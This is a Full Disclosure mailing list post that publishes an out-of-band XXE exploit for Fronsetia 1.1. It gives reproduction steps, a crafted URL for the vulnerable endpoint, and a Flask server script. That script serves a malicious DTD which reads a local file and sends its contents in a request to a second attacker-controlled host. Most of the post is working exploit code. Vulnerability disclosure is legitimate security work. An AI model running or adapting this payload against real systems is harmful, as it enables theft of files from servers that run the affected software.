Full Disclosure mailing list archives

# Exploit Title: XXE OOB - fronsetiav1.1
# Date: 11/2024
# Exploit Author: Andrey Stoykov
# Version: 1.1
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.html

XXE OOB

Description:

- It was found that the application was vulnerable XXE (XML External Entity
Injection)

Steps to Reproduce:

1. Add Python3 server to serve malicious XXE payload
2. Add a file on the file system to be read via the application XXE payload
echo 123123 > /tmp/123
3. Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl

// Python Server Code

from flask import Flask, Response, request
import logging

app = Flask(__name__)

# Set up logging
logging.basicConfig(level=logging.DEBUG)

@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM '
http://192.168.78.1:8000/?content=%file;&apos;>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• XXE OOB - fronsetiav1.1 Andrey Stoykov (Nov 21)